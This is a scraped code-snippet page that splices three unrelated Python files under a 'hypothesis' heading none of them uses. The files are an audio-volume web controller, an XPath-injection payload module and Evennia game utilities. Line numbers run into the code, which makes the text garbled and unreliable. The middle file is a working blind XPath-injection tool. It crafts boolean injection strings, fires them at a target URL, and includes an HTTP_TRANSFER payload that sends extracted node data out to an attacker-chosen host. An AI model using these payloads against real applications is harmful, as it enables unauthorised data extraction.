Best Python code snippet using hypothesis
tame.py
Source:tame.py  
1import time2import threading3import os4import ujson5import traceback6import argparse7import bottle8import alsaaudio9# has issue on the pi10# import soundmeter11# from soundmeter.monitor import Meter12from math import log1013driver_shared_data = {'cycle_time': 3}14def audio_meter(driver_shared_data):15    while True:16        try:17            m = Meter(collect=True, seconds=2)18            m.start()19            m.stop()20            driver_shared_data['db'] = 20 * log10(m._data['avg']/(32678.0 - 32677.0))21            print('metered db: {}'.format(driver_shared_data['db']))22        except Exception:23            pass24def tame_driver(driver_shared_data=None):25    """26    :param driver_shared_data: python shared object for runtime data27    :return:28    """29    if driver_shared_data is None:30        driver_shared_data = {}31    if not os.path.exists('./audio_file.json'):32        open('./audio_file.json', 'wb').write('{}')33    orig_config = ujson.load(open('./audio_file.json', 'rbU'))34    cur_time = time.localtime()35    if 7 <= cur_time.tm_hour <= 16:36        if (cur_time.tm_min < 1 and cur_time.tm_hour == 16) or cur_time.tm_hour < 16:37            min_key = 'MorMin'38            max_key = 'MorMax'39        else:40            min_key = 'EveMin'41            max_key = 'EveMax'42    elif 0 <= cur_time.tm_hour <= 16:43        if (cur_time.tm_min < 1 and cur_time.tm_hour == 0) or cur_time.tm_hour >= 16:44            min_key = 'EveMin'45            max_key = 'EveMax'46        else:47            min_key = 'NigMin'48            max_key = 'NigMax'49    else:50        min_key = 'NigMin'51        max_key = 'NigMax'52    config_min = int(orig_config.get(min_key, 20))53    config_max = int(orig_config.get(max_key, 50))54    last_update_time = time.ctime(os.path.getmtime('./audio_file.json'))55    while True:56        stopped = driver_shared_data.get('stop', False)57        if not stopped:58            cur_time = time.localtime()59            if 7 <= cur_time.tm_hour <= 16:60                if (cur_time.tm_min < 1 and cur_time.tm_hour == 16) or cur_time.tm_hour < 16:61                    min_key = 'MorMin'62                    max_key = 'MorMax'63                else:64                    min_key = 'EveMin'65                    max_key = 'EveMax'66            elif 0 <= cur_time.tm_hour >= 16:67                if (cur_time.tm_min < 1 and cur_time.tm_hour == 0) or cur_time.tm_hour >= 16:68                    min_key = 'EveMin'69                    max_key = 'EveMax'70                else:71                    min_key = 'NigMin'72                    max_key = 'NigMax'73            else:74                min_key = 'NigMin'75                max_key = 'NigMax'76            config_min = int(orig_config.get(min_key, 20))77            config_max = int(orig_config.get(max_key, 50))78            if not time.ctime(os.path.getmtime('./audio_file.json')) == last_update_time:79                last_update_time = time.ctime(os.path.getmtime('./audio_file.json'))80                orig_config = ujson.load(open('./audio_file.json', 'rbU'))81                print(orig_config)82                print(min_key, max_key)83                config_min = int(orig_config.get(min_key, 20))84                config_max = int(orig_config.get(max_key, 50))85                driver_shared_data['range'] = config_min, config_max86            else:87                print('the same')88            default_mixer = alsaaudio.Mixer()89            # print('have data: {}'.format(driver_shared_data))90            adjustment_mode = driver_shared_data.get('mode', 'linear')91            preferred_audio_range = driver_shared_data.get('range', (config_min, config_max, ))92            min_db, max_db = preferred_audio_range93            current_decibel_level = driver_shared_data.get('db', 35)94            current_volume = int(default_mixer.getvolume()[0])95            sweet_spot = driver_shared_data.get('sweet_spot', float(sum(preferred_audio_range)) / len(preferred_audio_range))96            print('current_volume: {}'.format(current_volume))97            print('preferred range: {}'.format(preferred_audio_range))98            try:99                # TODO: reinstitute sweet_spot when ready.100                # if current_decibel_level < sweet_spot and (current_decibel_level >= sweet_spot - 15 and current_decibel_level < preferred_audio_range[1] and preferred_audio_range[1] < preferred_audio_range[0]):101                #     default_mixer.setvolume(current_volume + 3)102                # if current_decibel_level == sweet_spot or current_decibel_level== sweet_spot - 2 or current_decibel_level == sweet_spot + 2:103                #     time.sleep(2)104                #     continue105                if current_decibel_level > max_db:106                    print('lowering')107                    default_mixer.setvolume(current_volume - 3)108                elif current_volume < min_db:109                    print('raising')110                    default_mixer.setvolume(current_volume + 3)111                elif (int(current_decibel_level) < int(sweet_spot) - 8) and sweet_spot - 8 > min_db:112                    default_mixer.setvolume(current_volume + 3)113                elif (int(current_decibel_level) > int(sweet_spot) + 8) and sweet_spot + 8 < max_db:114                    default_mixer.setvolume(current_volume - 3)115            except alsaaudio.ALSAAudioError as e:116                print(e)117            time.sleep(driver_shared_data.get('cycle_time', 3))118        else:119            time.sleep(1)120@bottle.route('/adjust', method='POST')121@bottle.route('/adjust/', method='POST')122def index():123    audio_data = ujson.loads(list(bottle.request.POST.keys())[0])124    global driver_shared_data125    print('Full request: {}'.format(audio_data))126    print('Received REST db: {}'.format(int(audio_data['value'])))127    driver_shared_data['db'] = int(audio_data['value'])128@bottle.route('/adjust/')129@bottle.route('/adjust')130def index_get():131    global driver_shared_data132    cycle_time = int(ujson.loads(bottle.request.GET.get('cycle_time', '-1')))133    if cycle_time > -1:134        driver_shared_data['cycle_time'] = cycle_time135    can_raise = ujson.loads(bottle.request.GET.get('raise', 'false'))136    if can_raise:137        driver_shared_data['db'] = driver_shared_data.get('db', 35) + 5138    can_lower = ujson.loads(bottle.request.GET.get('lower', 'false'))139    if can_lower:140        driver_shared_data['db'] = driver_shared_data.get('db', 35) - 5141    can_raise_max = ujson.loads(bottle.request.GET.get('raise_max', 'false'))142    if can_raise_max:143        min_db, max_db = driver_shared_data.get('range', (20, 50, ))144        driver_shared_data['range' ] = min_db, max_db + 5145    can_lower_min = ujson.loads(bottle.request.GET.get('lower_min', 'false'))146    if can_lower_min:147        min_db, max_db = driver_shared_data.get('range', (20, 50, ))148        driver_shared_data['range' ] = min_db - 5, max_db149    150    stop = ujson.loads(bottle.request.GET.get('stop', 'false'))151    if stop:152        driver_shared_data['stop'] = True153        driver_shared_data['start'] = False154    start = ujson.loads(bottle.request.GET.get('start', 'false'))155    if start:156        driver_shared_data['stop'] = False157        driver_shared_data['start'] = True158    reset = ujson.loads(bottle.request.GET.get('reset', 'false'))159    if reset:160        driver_shared_data['stop'] = False161        driver_shared_data['start'] = False162        driver_shared_data['range' ] = (20, 50)163        164    upper_range = ujson.loads(bottle.request.GET.get('too_high', 'false'))165    if upper_range:166        new_range = driver_shared_data.get('range', (20, 50, ))167        min_db, max_db = new_range168        new_value = (max_db - 5) or driver_shared_data.get('db', 35)169        max_db = new_value170        # if min_db < max_db:171        #     max_db = new_value - 5172        #     min_db = min_db if max_db >= min_db else max_db - 5173        # elif min_db > max_db:174        #     max_db = new_value + 5175        if max_db < min_db:176            min_db = max_db - 5177        new_range = min_db, max_db178        driver_shared_data['range'] = new_range179    lower_range = ujson.loads(bottle.request.GET.get('too_low', 'false'))180    if lower_range:181        new_range = driver_shared_data.get('range', (20, 50, ))182        min_db, max_db = new_range183        new_value = (min_db + 5) or driver_shared_data.get('db', 35)184        min_db = new_value185        # if max_db < min_db:186        #     min_db = new_value - 5187        #     max_db = max_db if min_db >= max_db else min_db - 5188        # elif max_db > min_db:189        #     min_db = new_value + 5190        if min_db > max_db:191            max_db = min_db + 5192        new_range = min_db, max_db193        driver_shared_data['range'] = new_range194    just_right = ujson.loads(bottle.request.GET.get('just_right', 'true'))195    if just_right:196        driver_shared_data['sweet_spot'] = driver_shared_data.get('db', 35)197    return ujson.dumps([['cur_db', driver_shared_data.get('db', 'NA')], ['range', driver_shared_data.get('range', (20, 50, ))]])198@bottle.route('/static/<filename>')199def server_static(filename):200    return bottle.static_file(filename, root='./')201@bottle.route('/hello')202def hello():203    if not os.path.exists('./audio_file.json'):204        open('./audio_file.json', 'wb').write('{}')205    audio_data = ujson.load(open('./audio_file.json', 'rbU'))206    mor_max = int(audio_data.get('MorMax', 50))207    mor_min = int(audio_data.get('MorMin', 20))208    eve_max = int(audio_data.get('EveMax', 50))209    eve_min = int(audio_data.get('EveMin', 20))210    nig_max = int(audio_data.get('NigMax', 50))211    nig_min = int(audio_data.get('NigMin', 20))212    return bottle.template('./firstpg.tpl', MorMin=mor_min, MorMax=mor_max, EveMin=eve_min, EveMax=eve_max, NigMin=nig_min, NigMax=nig_max)213@bottle.route('/settings', method ='Get')214def hello1():215        if not os.path.exists('./audio_file.json'):216            open('./audio_file.json', 'wb').write('{}')217        audio_data = ujson.load(open('./audio_file.json', 'rbU'))218    	MorMax = audio_data.get('MorMax', 50) 219	MorMin = audio_data.get('MorMin', 20)220	EveMax= audio_data.get('EveMax', 50) 221	EveMin = audio_data.get('EveMin', 20) 222	NigMax= audio_data.get('NigMax', 50) 223	NigMin = audio_data.get('NigMin', 20)224	return bottle.template('./secpg.tpl', MorMin=MorMin, MorMax=MorMax, EveMin=EveMin, EveMax=EveMax, NigMin=NigMin, NigMax=NigMax)225@bottle.route('/updatepg')226def hello2():227    mor_max = bottle.request.query.get('MorMax')228    mor_min = bottle.request.query.get('MorMin')229    eve_max = bottle.request.query.get('EveMax')230    eve_min = bottle.request.query.get('EveMin')231    nig_max = bottle.request.query.get('NigMax')232    nig_min = bottle.request.query.get('NigMin')233    if not os.path.exists('./audio_file.json'):234        open('./audio_file.json', 'wb').write('{}')235    audio_data = ujson.load(open('./audio_file.json', 'rbU'))236    audio_data['MorMax'] = int(mor_max)237    audio_data['MorMin'] = int(mor_min)238    audio_data['EveMax'] = int(eve_max)239    audio_data['EveMin'] = int(eve_min)240    audio_data['NigMax'] = int(nig_max)241    audio_data['NigMin'] = int(nig_min)242    ujson.dump(audio_data, open('./audio_file.json', 'wb'))243    bottle.redirect('/hello')244   245tame_thread = threading.Thread(target=tame_driver, kwargs=dict(driver_shared_data=driver_shared_data))246tame_thread.daemon = True247audio_thread = threading.Thread(target=audio_meter, args=(driver_shared_data, ))248audio_thread.daemon = True249# audio_thread.start()250if __name__ == '__main__':251    ap = argparse.ArgumentParser()252    ap.add_argument('--only-meter', type=bool, help='Whether or not we only want to meter the sound -- not provide control',253                    default=False)254    args = ap.parse_args()255    if not args.only_meter:256        tame_thread.start()257    bottle.run(host='0.0.0.0', port=8000)258    # while True:...payloads.py
Source:payloads.py  
1# Payloads.py2# Makes XPath 1.0 and 2.0 payload strings3from twisted.web.iweb import IBodyProducer4from zope.interface import implements5from twisted.internet.protocol import Protocol6import string7from twisted.web.client import Agent8from twisted.internet import reactor, defer9from twisted.web.http_headers import Headers10import urllib1112class Payload(object):13    def __init__(self, payload, can_lower=False, normalization=False, takes_codepoints=False):14        self.payload = string.Template(payload)1516        self.can_lower = can_lower17        self.normalization = normalization18        self.takes_codepoints = takes_codepoints1920    def replace(self, char, newchar):21        self.payload = string.Template(self.payload.template.replace(char, newchar))22        return self2324    def Create(self, parent):25        output = self.payload26        if parent.config.xversion == "2":27            if self.takes_codepoints:28                output = string.Template(output.safe_substitute(node=parent.PAYLOADS["STRING-TO-CODEPOINTS"].GetString()))29                #print "Output (codepoints): %s"%output.template3031            if parent.config.normalize_unicode and self.normalization:32                output = string.Template(output.safe_substitute(node=parent.PAYLOADS["WRAP_UNICODE"].GetString()))33                #print "Output (norm): %s"%output.template3435            if parent.config.lowercase and self.can_lower:36                output = string.Template(output.safe_substitute(node=parent.PAYLOADS["WRAP_LOWERCASE"].GetString()))37                #print "Output (lower): %s"%output.template3839        return string.Template(parent.BASE.substitute(payload=output.safe_substitute()))4041    def GetString(self):42        return self.payload.template4344    def __repr__(self):45        return str(self)4647    def __str__(self):48        return "<Payload `%s`>"%(self.payload)4950class WrapperPayload(Payload):51    pass525354class PayloadMaker(object):5556    PAYLOADS = {57        "DETECT_VERSION"       : Payload("lower-case('A')='a'"),58        "WRAP_LOWERCASE"       : WrapperPayload("lower-case($node)"),59        "WRAP_UNICODE"         : WrapperPayload("normalize-unicode($node)"),60        "STRING-TO-CODEPOINTS" : WrapperPayload("string-to-codepoints($node)"),61        "HTTP_TRANSFER"        : WrapperPayload("boolean(doc(concat('http://$host$port/?id=$id-',encode-for-uri($node))))", can_lower=True, normalization=True),6263        "GET_NODE_CODEPOINT"   : Payload("string-to-codepoints($node)[$index]=$count", can_lower=True, normalization=True),64        "GET_CODEPOINT_LENGTH" : Payload("(string-to-codepoints($node)[$index] > $min and string-to-codepoints($node)[$index] <= $max)", can_lower=True, normalization=True),65        "GET_NODE_SUBSTRING"   : Payload("substring($node,$count,1)='$character'", can_lower=True, normalization=True),6667        "NODEVALUE_LENGTH"     : Payload("string-length($node)=$count", can_lower=True, normalization=True),68        "GET_CONTENT_LENGTH"   : Payload("(string-length($node) > $min and string-length($node) <= $max)", can_lower=True, normalization=True),6970        #"GET_COUNT_LENGTH_STR" : Payload("(count($node) > $min and count($node) <= $max)", can_lower=True, normalization=True),71        "GET_COUNT_LENGTH"     : Payload("(count($node) > $min and count($node) <= $max)"),72        "NODE_COUNT"           : Payload("count($node)=$count"),7374        "GET_COUNT_LENGTH_U"   : Payload("(count($node) > $min and count($node) <= $max)", can_lower=True, normalization=True, takes_codepoints=True),75        "NODE_COUNT_U"         : Payload("count($node)=$count", can_lower=True, normalization=True, takes_codepoints=True),7677        }787980    def __init__(self, config):81        self.config = config82        self.search_space = string.ascii_letters + string.digits + " .-"83        self.agent = Agent(reactor)8485        self._headers = Headers({"User-Agent":[config.user_agent]})8687        if config.error_keyword:88            self.BASE = string.Template("' and (if ($payload) then error() else 0) and '1' = '1".replace("'", config.quote_character))89        else:90            self.BASE = string.Template("' and $payload and '1'='1".replace("'", config.quote_character))9192        for payload in self.PAYLOADS:93            self.PAYLOADS[payload] = self.PAYLOADS[payload].replace("'", config.quote_character)949596    def Get(self, name):97        payload = self.PAYLOADS[name.upper()].Create(self)98        return payload.safe_substitute99100    @defer.inlineCallbacks101    def RunQuery(self, payload, errorCount=0):102        if self.config.http_method == "GET":103            URI = "%s?%s"%(self.config.URL,104                           self.config.post_argument + urllib.quote_plus(payload))105        else:106            URI = self.config.URL107108        try:109            response = yield self.agent.request(110                self.config.http_method,111                URI,112                self._headers,113                StringProducer(self.config.post_argument + payload) if self.config.http_method == "POST" else None114            )115116            body_deferred = defer.Deferred()117            response.deliverBody(QuickAndDirtyReceiver(body_deferred))118            content = yield body_deferred119        except Exception:120            if errorCount >= 5:121                raise122            else:123                d = defer.Deferred()124                reactor.callLater(errorCount / 2, d.callback, None)125                yield d126                ret = yield self.RunQuery(payload, errorCount + 1)127                defer.returnValue(ret)128129130        if any([self.config.true_code, self.config.error_code, self.config.fail_code]):131            # Doing it via HTTP status codes132            if self.config.true_code:133                defer.returnValue(self.config.true_code == response.code)134            elif self.config.error_code:135                defer.returnValue(self.config.error_code == response.code)136            else:137                defer.returnValue(self.config.fail_code == response.code)138        else:139140            if self.config.error_keyword:141                defer.returnValue(self.config.error_keyword in content)142            elif self.config.lookup:143                defer.returnValue(self.config.true_keyword in content)144            else:145                defer.returnValue(self.config.false_keyword in content)146147148    def GetSearchSpace(self):149        return self.search_space150151    def SetSearchSpace(self, space):152        self.search_space = space153154    @defer.inlineCallbacks155    def DetectXPathVersion(self):156        x = yield self.RunQuery(self.Get("DETECT_VERSION")())157        if x:158            self.config.xversion = "2"159            defer.returnValue(2)160        else:161            self.config.xversion = "1"162            defer.returnValue(1)163164class QuickAndDirtyReceiver(Protocol):165    def __init__(self, deferred):166        self.deferred = deferred167        self.buffer = ""168169    def dataReceived(self, data):170        self.buffer+=data171172    def connectionLost(self, reason):173        self.deferred.callback(self.buffer)174175class StringProducer(object):176    implements(IBodyProducer)177178    def __init__(self, body):179        self.body = body180        self.length = len(body)181182    def startProducing(self, consumer):183        consumer.write(self.body)184        return defer.succeed(None)185186    def pauseProducing(self):187        pass188189    def stopProducing(self):
...utils.py
Source:utils.py  
1import uuid2import typing3import random4import string5import yaml6import json7from pathlib import Path8from evennia.utils.ansi import parse_ansi, ANSIString9from rich.ansi import AnsiDecoder10from rich.console import group11from collections import defaultdict12def read_json_file(p: Path):13    return json.loads(open(p, mode='rb').read())14def read_yaml_file(p: Path):15    return yaml.safe_load(open(p, mode="r"))16def read_data_file(p: Path):17    if p.name.lower().endswith(".json"):18        return read_json_file(p)19    elif p.name.lower().endswith(".yaml"):20        return read_yaml_file(p)21    return None22def fresh_uuid4(existing) -> uuid:23    """24    Given a list of UUID4s, generate a new one that's not already used.25    Yes, I know this is silly. UUIDs are meant to be unique by sheer statistic unlikelihood of a conflict.26    I'm just that afraid of collisions.27    """28    existing = set(existing)29    fresh_uuid = uuid.uuid4()30    while fresh_uuid in existing:31        fresh_uuid = uuid.uuid4()32    return fresh_uuid33def partial_match(34    match_text: str, candidates: typing.Iterable[typing.Any], key: callable = str, exact: bool = False) -> typing.Optional[typing.Any]:35    """36    Given a list of candidates and a string to search for, does a case-insensitive partial name search against all37    candidates, preferring exact matches.38    Args:39        match_text (str): The string being searched for.40        candidates (list of obj): A list of any kind of object that key can turn into a string to search.41        key (callable): A callable that must return a string, used to do the search. this 'converts' the objects in the42            candidate list to strings.43    Returns:44        Any or None.45    """46    candidate_list = sorted(candidates, key=lambda item: len(key(item)))47    mlow = match_text.lower()48    for candidate in candidate_list:49        can_lower = key(candidate).lower()50        if mlow == can_lower:51            return candidate52        if not exact:53            if can_lower.startswith(mlow):54                return candidate55def generate_name(prefix: str, existing, gen_length: int = 20) -> str:56    def gen():57        return f"{prefix}_{''.join(random.choices(string.ascii_letters + string.digits, k=gen_length))}"58    while (u := gen()) not in existing:59        return u60@group()61def ev_to_rich(s: str):62    if isinstance(s, ANSIString):63        for line in AnsiDecoder().decode(str(s)):64            yield line65    else:66        ev = parse_ansi(s, xterm256=True, mxp=True)67        for line in AnsiDecoder().decode(ev):68            yield line69def echo_action(template: str, actors: dict[str, "DefaultObject"], viewers: typing.Iterable["DefaultObject"], **kwargs):70    for viewer in viewers:71        var_dict = defaultdict(lambda: "!ERR!")72        var_dict.update(kwargs)73        for k, v in actors.items():74            v.get_template_vars(var_dict, k, looker=viewer)75        viewer.msg(text=ev_to_rich(template.format_map(var_dict)))76def iequals(first: str, second: str):...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.
Get 100 minutes of automation test minutes FREE!!
